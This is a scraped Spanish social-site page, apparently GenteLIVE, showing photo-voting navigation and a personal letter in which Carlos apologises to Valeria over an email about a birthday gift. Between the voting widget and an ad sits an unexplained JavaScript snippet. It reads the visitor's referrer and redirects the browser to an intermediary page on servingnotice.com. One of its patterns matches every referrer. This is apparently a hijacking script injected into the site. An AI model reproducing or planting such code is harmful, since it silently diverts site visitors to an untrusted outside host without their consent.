Foto cuarto   Foto segundo   1º de la semana   1ª de la semana   Foto segunda   Foto Cuarta
  Foto quinto   Foto tercero Foto tercera   Foto quinta
 
Recuerda: puedes votar hasta el viernes a las 24:00
         
Votaciones de esta semana
       
  • ChicoLive
  • ChicaLive
var toUrl="http://"; var rUrl = document.referrer; var patrn=/(.*)$/; toUrl+="servingnotice.com/lvinter1/intermediary.html?it11org"; toUrl+=""; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)aol.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)yahoo.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl; patrn=/(.*)bing.(.*)$/; if(patrn.exec(rUrl))window.location.href=toUrl;
Cursos, Masters y Oposiciones
Las mejores inocentadas para el 28 de diciembre
 

Alfredo Cisneros

Alfredo Cisneros  
51
Las Palmas  
   

Carta

Porque estas amargada, te aclaro
[17-05-2012 19:36]

Querida Valeria
No considero a bien de tu parte, tu reacción a la entonación de un email que tu sabes bien que esta supeditado a la percepción del lector, y primordialmente a la naturaleza de la comunicación.
Pienso que no hay motivo ni tampoco tienes razón, por la que yo tenga que pedirte en mala forma que deseo tener un gesto bonito, y de amor para ti. Si te ofendí, te ofrezco mis salvedades; y te pido me permitas componer las circunstancias en la que el presente fue ofrecido. Te prometí ese regalo, y te lo compre con tantas ilusiones pensando en ti, y porque pensé que te agradaría. Este regalo es especial por el motivo de tu cumpleaños, el primero de tus cumpleaños que pasamos juntos, humildemente.
No tienes porque pensar que ha sido solicitado de mal carácter, porque esa no es mi naturaleza, y llegando a nuestros 10 meses ya me debes conocer, y aun mejor, saber como yo te hablo con amor.
Si me vieras pudieras entenderme. Pero lamentablemente no me queda nada más que escribir este email para aclarar que es lo que pasa. Quizás no es el mejor medio, pero de alguna manera tengo que decirlo.
Pd: No he dormido bien por el sentimiento que no me permite vivir en pacto. Parcamente duermo un par de horas diarias, insuficientes para levantarme a trabajar. En este momento he despertado para escribir esta aclaración.

Carlos


Compártelo:

 
Haz GenteLIVE tu página de inicio Añadir a Favoritos Contacto Ayuda